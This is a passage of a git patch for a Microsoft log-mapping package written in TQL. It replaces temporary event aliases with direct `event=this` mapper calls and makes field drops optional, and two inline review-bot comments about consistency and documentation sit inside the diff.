From: Matthias Vallentin Date: Thu, 11 Jun 2026 17:31:27 +0200 Subject: [PATCH 21/27] Pass current events directly to mappers Remove temporary event aliases from Microsoft examples and tests now that the mappers take a named event argument. Make mapper cleanup drops optional so direct event=this calls do not emit field-not-found warnings after the current event shape changes. Assisted-by: GPT-5 (Codex) --- .../changelog/unreleased/ocsf-to-asim-mapper.md | 14 ++++++++------ .../examples/graph-defender-alerts-to-ocsf.tql | 4 +--- .../examples/graph-defender-incidents-to-ocsf.tql | 4 +--- .../examples/graph-directory-audits-to-ocsf.tql | 4 +--- .../examples/graph-intune-compliance-to-ocsf.tql | 4 +--- .../graph-intune-detected-apps-to-ocsf.tql | 4 +--- .../graph-intune-managed-devices-to-ocsf.tql | 4 +--- .../examples/graph-risk-detections-to-ocsf.tql | 4 +--- microsoft/examples/graph-risky-users-to-ocsf.tql | 4 +--- microsoft/examples/graph-sign-ins-to-asim.tql | 8 ++------ microsoft/examples/graph-sign-ins-to-ocsf.tql | 4 +--- microsoft/examples/windows-event-log-to-asim.tql | 4 +--- microsoft/operators/asim/ocsf/account_change.tql | 2 +- microsoft/operators/asim/ocsf/authentication.tql | 2 +- .../operators/asim/ocsf/authorize_session.tql | 2 +- .../operators/asim/ocsf/compliance_finding.tql | 2 +- .../operators/asim/ocsf/detection_finding.tql | 2 +- microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 +- microsoft/operators/asim/ocsf/dns_activity.tql | 2 +- .../operators/asim/ocsf/entity_management.tql | 2 +- .../operators/asim/ocsf/event_log_activity.tql | 2 +- .../operators/asim/ocsf/file_system_activity.tql | 2 +- microsoft/operators/asim/ocsf/group_management.tql | 2 +- microsoft/operators/asim/ocsf/http_activity.tql | 2 +- microsoft/operators/asim/ocsf/network_activity.tql | 2 +- microsoft/operators/asim/ocsf/process_activity.tql | 2 +- .../operators/asim/ocsf/scheduled_job_activity.tql | 2 +- .../asim/ocsf/windows_service_activity.tql | 2 +- 
microsoft/operators/graph/ocsf/map.tql | 2 +- microsoft/tests/asim/graph.tql | 8 ++------ microsoft/tests/asim/ocsf.tql | 4 +--- microsoft/tests/asim/ocsf/account_change.tql | 4 +--- microsoft/tests/asim/ocsf/authentication.tql | 4 +--- microsoft/tests/asim/ocsf/detection_finding.tql | 4 +--- microsoft/tests/asim/ocsf/dhcp_activity.tql | 4 +--- microsoft/tests/asim/ocsf/dns_activity.tql | 4 +--- microsoft/tests/asim/ocsf/event_log_activity.tql | 4 +--- microsoft/tests/asim/ocsf/file_system_activity.tql | 4 +--- microsoft/tests/asim/ocsf/group_management.tql | 4 +--- microsoft/tests/asim/ocsf/http_activity.tql | 4 +--- microsoft/tests/asim/ocsf/network_activity.tql | 4 +--- microsoft/tests/asim/ocsf/process_activity.tql | 4 +--- microsoft/tests/asim/windows.tql | 4 +--- .../compliance-policy-setting-state-summaries.tql | 4 +--- microsoft/tests/graph/ocsf/defender-alerts.tql | 4 +--- microsoft/tests/graph/ocsf/defender-incidents.tql | 4 +--- microsoft/tests/graph/ocsf/detected-apps.tql | 4 +--- microsoft/tests/graph/ocsf/directory-audits.tql | 4 +--- microsoft/tests/graph/ocsf/managed-devices.tql | 4 +--- microsoft/tests/graph/ocsf/risk-detections.tql | 4 +--- microsoft/tests/graph/ocsf/risky-users.tql | 4 +--- microsoft/tests/graph/ocsf/sign-ins.tql | 4 +--- 52 files changed, 61 insertions(+), 131 deletions(-) diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index a59053f..68e1d23 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md 
@@ -14,12 +14,14 @@ Microsoft events into flat Microsoft Sentinel ASIM event records. The mapper uses the new `microsoft::ocsf::map` entry point and `microsoft::asim::ocsf::map` for validated OCSF 1.8 events. -Microsoft mapping operators now treat the current event as the source event to -map. For raw Windows Event Log XML, first run `this = data.parse_winlog()`; -the resulting structured event can then be normalized through -`microsoft::ocsf::map` or `microsoft::asim::map`. Mapping operators accept an -optional `raw` value when the original source payload is still available and -should be preserved in OCSF `raw_data` and `raw_data_size`. +Microsoft mapping operators now accept the source event through the named +`event` argument. For raw Windows Event Log XML, first run +`win = data.parse_winlog()`; the resulting structured event can then be +normalized through `microsoft::windows::ocsf::map event=win`. Validated OCSF +events can be converted with `microsoft::asim::map event=this` or +`microsoft::asim::ocsf::map event=this`. Mapping operators accept an optional +`raw` value when the original source payload is still available and should be +preserved in OCSF `raw_data` and `raw_data_size`. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql index 5432695..3b5189b 100644 --- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql +++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql @@ -8,8 +8,6 @@ microsoft::graph::defender::alerts \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast 
diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql
index f7d5ccd..126f5a6 100644
--- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql
+++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql
@@ -9,9 +9,7 @@ every 5m {
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 }
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql
index 6cbec07..d4880e2 100644
--- a/microsoft/examples/graph-directory-audits-to-ocsf.tql
+++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql
@@ -9,9 +9,7 @@ every 5m {
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 }
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql
index a5f4567..b0475dc 100644
--- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql
@@ -8,9 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
index 20d3bc1..7ff5f48 100644
--- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
@@ -8,9 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
index b19b182..01f0a72 100644
--- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
@@ -7,8 +7,6 @@ microsoft::graph::intune::managed_devices \
 tenant_id="TENANT_ID",
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql
index 191cac5..c81613b 100644
--- a/microsoft/examples/graph-risk-detections-to-ocsf.tql
+++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql
@@ -8,9 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql
index e0584d5..8396a6b 100644
--- a/microsoft/examples/graph-risky-users-to-ocsf.tql
+++ b/microsoft/examples/graph-risky-users-to-ocsf.tql
@@ -8,9 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-sign-ins-to-asim.tql b/microsoft/examples/graph-sign-ins-to-asim.tql
index 193eb60..58b48a4 100644
--- a/microsoft/examples/graph-sign-ins-to-asim.tql
+++ b/microsoft/examples/graph-sign-ins-to-asim.tql
@@ -9,11 +9,7 @@ microsoft::graph::sign_ins \
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 @name = "microsoft.graph.sign_in"
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
-event = this
-microsoft::asim::map event=event
-this = event
+microsoft::asim::map event=this
diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql
index 96f5a04..396489c 100644
--- a/microsoft/examples/graph-sign-ins-to-ocsf.tql
+++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql
@@ -8,8 +8,6 @@ microsoft::graph::sign_ins \
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
-event = this
-microsoft::ocsf::map event=event
-this = event
+microsoft::ocsf::map event=this
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/examples/windows-event-log-to-asim.tql b/microsoft/examples/windows-event-log-to-asim.tql
index b5ba3c3..92a7fe2 100644
--- a/microsoft/examples/windows-event-log-to-asim.tql
+++ b/microsoft/examples/windows-event-log-to-asim.tql
@@ -13,6 +13,4 @@ win.raw_data_size = win.raw_data.length_bytes()
 this = win
 ocsf::derive
 ocsf::cast
-event = this
-microsoft::asim::map event=event
-this = event
+microsoft::asim::map event=this
diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql
index 5d3bda3..0b7d201 100644
--- a/microsoft/operators/asim/ocsf/account_change.tql
+++ b/microsoft/operators/asim/ocsf/account_change.tql
@@ -52,4 +52,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.SrcHostname = ocsf.src_endpoint?.hostname?
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql
index 48e7b06..aae1000 100644
--- a/microsoft/operators/asim/ocsf/authentication.tql
+++ b/microsoft/operators/asim/ocsf/authentication.tql
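Review bot: The graph-sign-ins-to-ocsf.tql hunk goes from `lookback=5m` straight to `microsoft::ocsf::map event=this`, whereas the sibling graph-sign-ins-to-asim.tql hunk just above sets `@name = "microsoft.graph.sign_in"` first; since graph/ocsf/map.tql dispatches on `match @name`, either `microsoft::graph::sign_ins` already stamps the name (making the explicit assignment in the ASIM example redundant) or this example hits the unmatched branch. The two examples should agree, and if the assignment is needed here the fix is one line after `lookback=5m`: `@name = "microsoft.graph.sign_in"`.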
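Review bot: `drop ocsf?, asim?` in account_change.tql works around the fact that `$event = {...asim, AdditionalFields: ocsf}` on the line above replaces the entire event when the caller passes `event=this`, taking the two temporaries with it, but nothing in the file explains the `?`, and the same bare change is repeated in authentication.tql through windows_service_activity.tql and as `drop graph?, ocsf?` in graph/ocsf/map.tql. A one-line comment above the drop in each mapper keeps the next reader from restoring the strict form: `// The temporaries are already gone when $event is this; tolerate their absence.`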
@@ -65,4 +65,4 @@ if ocsf.auth_factors? != null {
 }
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql
index 1597761..ce2a78e 100644
--- a/microsoft/operators/asim/ocsf/authorize_session.tql
+++ b/microsoft/operators/asim/ocsf/authorize_session.tql
@@ -62,4 +62,4 @@ if ocsf.auth_factors? != null {
 }
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql
index efc0a01..4a0a5b0 100644
--- a/microsoft/operators/asim/ocsf/compliance_finding.tql
+++ b/microsoft/operators/asim/ocsf/compliance_finding.tql
@@ -47,4 +47,4 @@ match ocsf.verdict? {
 }
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql
index 510424b..b061cee 100644
--- a/microsoft/operators/asim/ocsf/detection_finding.tql
+++ b/microsoft/operators/asim/ocsf/detection_finding.tql
@@ -62,4 +62,4 @@ match ocsf.verdict? {
 }
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql
index 9973929..d785bc4 100644
--- a/microsoft/operators/asim/ocsf/dhcp_activity.tql
+++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql
@@ -27,4 +27,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.SrcMacAddr = ocsf.src_endpoint?.mac?
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql
index 1f0b6e9..b523a92 100644
--- a/microsoft/operators/asim/ocsf/dns_activity.tql
+++ b/microsoft/operators/asim/ocsf/dns_activity.tql
@@ -32,4 +32,4 @@ asim.DstIpAddr = ocsf.dst_endpoint?.ip?
 asim.DstHostname = ocsf.dst_endpoint?.hostname?
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql
index de663a9..4fb8972 100644
--- a/microsoft/operators/asim/ocsf/entity_management.tql
+++ b/microsoft/operators/asim/ocsf/entity_management.tql
@@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname?
 asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql
index eda9813..b2ed048 100644
--- a/microsoft/operators/asim/ocsf/event_log_activity.tql
+++ b/microsoft/operators/asim/ocsf/event_log_activity.tql
@@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname?
 asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql
index 37cf962..7a62c1a 100644
--- a/microsoft/operators/asim/ocsf/file_system_activity.tql
+++ b/microsoft/operators/asim/ocsf/file_system_activity.tql
@@ -42,4 +42,4 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null {
 asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local"
 $event = {...asim, AdditionalFields: ocsf}
-drop ocsf, asim
+drop ocsf?, asim?
diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql
index 2437da8..67b7eae 100644
--- a/microsoft/operators/asim/ocsf/group_management.tql
+++ b/microsoft/operators/asim/ocsf/group_management.tql
@@ -48,4 +48,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 92f6e13..c418c51 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -25,4 +25,4 @@ if ocsf.http_response?.code? != null { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 70b9a6b..9174575 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -40,4 +40,4 @@ match ocsf.disposition? { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 0d94a2c..48212e1 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -36,4 +36,4 @@ asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 1444363..f77cdf2 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? 
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index ae5e1b5..5cecccb 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 1489dc1..1cb726f 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -70,4 +70,4 @@ match @name { } $event = {...ocsf, unmapped: graph} -drop graph, ocsf +drop graph?, ocsf? diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql index ec0b8ec..a23870f 100644 --- a/microsoft/tests/asim/graph.tql +++ b/microsoft/tests/asim/graph.tql @@ -2,13 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql index 1dd292b..1b8dd42 100644 --- a/microsoft/tests/asim/ocsf.tql +++ b/microsoft/tests/asim/ocsf.tql @@ -30,7 +30,5 @@ from { ip: 10.0.0.1, }, } -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this name = @name diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql index 93c9845..370e3fb 100644 --- a/microsoft/tests/asim/ocsf/account_change.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql 
@@ -77,8 +77,6 @@ from { } @name = "ocsf.account_change" where class_uid == 3001 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql index 092e691..d0ed7ed 100644 --- a/microsoft/tests/asim/ocsf/authentication.tql +++ b/microsoft/tests/asim/ocsf/authentication.tql @@ -143,8 +143,6 @@ from { }, } @name = "ocsf.authentication" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/detection_finding.tql b/microsoft/tests/asim/ocsf/detection_finding.tql index ea4bd97..1b243e5 100644 --- a/microsoft/tests/asim/ocsf/detection_finding.tql +++ b/microsoft/tests/asim/ocsf/detection_finding.tql @@ -51,7 +51,5 @@ from { ], } @name = "ocsf.detection_finding" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql index ab5dce3..ffb274f 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4004 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql index aaebb7e..327881f 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.tql +++ b/microsoft/tests/asim/ocsf/dns_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4003 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid 
diff --git a/microsoft/tests/asim/ocsf/event_log_activity.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql index e96d16e..9a65f42 100644 --- a/microsoft/tests/asim/ocsf/event_log_activity.tql +++ b/microsoft/tests/asim/ocsf/event_log_activity.tql @@ -39,7 +39,5 @@ from { }, } @name = "ocsf.event_log_activity" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql index 2fdaa6b..f1792ec 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.tql +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 1001 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql index 2290440..a3adc02 100644 --- a/microsoft/tests/asim/ocsf/group_management.tql +++ b/microsoft/tests/asim/ocsf/group_management.tql @@ -77,8 +77,6 @@ from { } @name = "ocsf.group_management" where class_uid == 3006 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql index 0aad2b6..a6e0fab 100644 --- a/microsoft/tests/asim/ocsf/http_activity.tql +++ b/microsoft/tests/asim/ocsf/http_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4002 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql index 7464df1..e590998 100644 --- a/microsoft/tests/asim/ocsf/network_activity.tql 
+++ b/microsoft/tests/asim/ocsf/network_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4001 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/process_activity.tql b/microsoft/tests/asim/ocsf/process_activity.tql index f274b93..c99aad2 100644 --- a/microsoft/tests/asim/ocsf/process_activity.tql +++ b/microsoft/tests/asim/ocsf/process_activity.tql @@ -55,7 +55,5 @@ from { }, } @name = "ocsf.process_activity" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index 380fadb..c1069a4 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -8,8 +8,6 @@ win.raw_data_size = win.raw_data.length_bytes() this = win ocsf::derive ocsf::cast -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this name = @name drop AdditionalFields.metadata.processed_time? diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql index 0458603..5d4e209 100644 --- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql +++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari read_json } @name = "microsoft.graph.intune.compliance_policy_setting_state_summary" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql index 1c11eb4..cf784ee 100644 --- a/microsoft/tests/graph/ocsf/defender-alerts.tql 
+++ b/microsoft/tests/graph/ocsf/defender-alerts.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" { read_json } @name = "microsoft.graph.defender.alert" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql index 47eeb98..e0c015e 100644 --- a/microsoft/tests/graph/ocsf/defender-incidents.tql +++ b/microsoft/tests/graph/ocsf/defender-incidents.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" { read_json } @name = "microsoft.graph.defender.incident" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast sort time, metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql index 30f8d42..1637d4e 100644 --- a/microsoft/tests/graph/ocsf/detected-apps.tql +++ b/microsoft/tests/graph/ocsf/detected-apps.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" { read_json } @name = "microsoft.graph.intune.detected_app" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql index 729d082..95f4e46 100644 --- a/microsoft/tests/graph/ocsf/directory-audits.tql +++ b/microsoft/tests/graph/ocsf/directory-audits.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" { read_json } @name = "microsoft.graph.directory_audit" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast sort time 
diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql index db70247..02f9820 100644 --- a/microsoft/tests/graph/ocsf/managed-devices.tql +++ b/microsoft/tests/graph/ocsf/managed-devices.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" { read_json } @name = "microsoft.graph.intune.managed_device" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql index 70bfa49..444acb3 100644 --- a/microsoft/tests/graph/ocsf/risk-detections.tql +++ b/microsoft/tests/graph/ocsf/risk-detections.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risk_detection" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql index f032774..c7ea153 100644 --- a/microsoft/tests/graph/ocsf/risky-users.tql +++ b/microsoft/tests/graph/ocsf/risky-users.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risky_user" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git 